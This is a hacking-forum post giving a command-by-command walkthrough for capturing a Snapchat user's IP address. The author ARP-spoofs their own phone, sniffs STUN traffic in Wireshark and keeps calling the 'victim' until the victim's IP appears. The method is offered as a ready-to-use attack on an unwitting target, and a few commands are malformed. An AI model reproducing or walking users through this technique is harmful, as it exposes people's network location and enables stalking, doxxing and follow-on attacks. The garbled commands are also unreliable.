REDEYE
Golden Member
- Joined
- October 6, 2024
- Messages
- 792
- Reaction score
- 3,246
- Points
- 93
- Thread Author
- #1
Here is some things you will need in order to make this work:
Requirements: - Mac OS X / Kali linux ( or any UNIX )
- A phone where you have snapchat on ( Im assuming its a phone )
- Nmap
- Some tools and little MITM knowledge !
Here's how it's done:
Download Wireshark Wireshark • Go Deep
Download arpspoof for Mac GitHub - ivanvza/arpy: Mac OSX ARP spoof (MiTM) tool that can also plug into Gource
- Fire up terminal and ip forward your laptop/pc with this scripts:
Code:
Code:
sudo sysctl net.ipv4.ip_forward = 1
sudo net.ipv4.ip_forward = 1
Code:
Code:
sudo sysctl -w net.inet.ip.forwarding=1
- Find your phone device local ip and write it down.
Code:
Code:nmap -sn (or -sP) <gateway ip>/24
Code:
Code:
nmap -sn 192.168.0.1/24
- Spoof your phone.
Code:
Code:arpspoof -i -t gateway
Code:
Code:
[code]
arpspoof -i en0 -t 192.168.0.160 192.168.0.1
Sometimes you need to reverse arpspoof aswell so to be safe, switch gateway with phone ip:
Code:
Code:
[code]
arpspoof -i en0 -t 192.168.0.1 192.168.0.160
- Fire up Wireshark and filter on your phone ip with STUN protocol
Code:
Code:ip.addr == <phone ip> && stun
Code:
Code:
[code]
ip.addr == 192.168.0.160 && stun
- Call your victim on snap and keep calling him for around 5 seconds.
Wireshark should throw up some binding requests, then some other STUN ones.
Those last ones are your victim's ip.